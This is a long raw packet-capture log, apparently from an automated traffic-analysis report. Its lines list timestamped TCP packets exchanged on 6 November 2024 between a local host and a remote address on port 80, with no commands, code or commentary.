                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979676962 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979685068 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979697943 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979710102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979711056 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979729891 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979763031 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979774952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979785919 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979794979 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979798079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979810953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979819059 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979823112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979835987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979841948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979882956 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979892015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979902029 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979916096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979933977 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979940891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979950905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979963064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979969025 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979974985 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979991913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980007887 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980029106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980053902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980066061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980077028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980087996 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980098963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980102062 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980123043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980140924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980153084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980164051 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980185032 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980209112 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980230093 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980240107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980251074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980272055 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980299950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980318069 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980329990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980340958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980341911 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980361938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980391979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980413914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980426073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980436087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980439901 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980453968 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980457067 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980468035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980498075 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980566025 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980577946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980590105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980601072 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980609894 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980623960 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980654955 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980665922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980678082 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980700016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980703115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980710983 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980720043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980724096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980746984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980747938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980760098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980791092 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980921984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.980959892 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981059074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981071949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981082916 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981095076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981103897 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981116056 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981125116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981132030 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981137037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981148958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981158972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981161118 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981172085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981182098 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981206894 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981220961 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981234074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981245041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981256008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981266975 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981268883 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981276989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981292009 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981312990 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981538057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981550932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981563091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981590986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981590986 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981601954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981614113 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981618881 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981626987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981642008 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981646061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981657028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981667042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981679916 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981688976 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981705904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981712103 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981723070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981733084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981743097 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981745958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981772900 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981796980 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981807947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981818914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981841087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981848955 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981853008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981862068 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981865883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981878042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981889009 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981894016 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981904030 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981909990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981921911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981931925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981940031 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981944084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981956005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981964111 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981969118 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.981987953 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982022047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982033968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982050896 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982074022 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982103109 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982314110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982327938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982342958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982364893 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982392073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982408047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982418060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982424021 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982443094 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982455015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982460976 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982466936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982477903 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982489109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982491970 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982501984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982511997 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982547045 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982574940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982587099 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982608080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982629061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982630014 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982640982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982650995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982657909 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982664108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982675076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982686043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982686996 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982697964 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982707977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982712030 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982728958 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982729912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982742071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982752085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982760906 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982773066 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982785940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982793093 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982798100 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982810974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982820988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982826948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982834101 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982851028 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982873917 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982892036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982924938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982935905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982953072 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982971907 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982984066 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.982994080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983002901 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983006001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983028889 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983047009 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983059883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983081102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983149052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983169079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983181000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983190060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983192921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983210087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983211040 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983232021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983243942 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983247995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983254910 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983267069 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983274937 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983289003 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983299017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983309031 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983315945 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983326912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983330011 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983339071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983350039 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983360052 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983371973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983382940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983392000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983392954 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983407021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983408928 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983419895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983434916 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983443975 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983474016 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983539104 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983575106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983587980 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983618975 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983647108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983664989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983676910 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983688116 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983694077 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983707905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983712912 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983738899 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983751059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983771086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983784914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983798027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983812094 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983839035 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983872890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983886957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983899117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983911037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983922958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983927965 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.983952999 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984014988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984035015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984056950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984061003 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984071970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984082937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.984091997 CET8049719185.215.113.16192.168.2.5
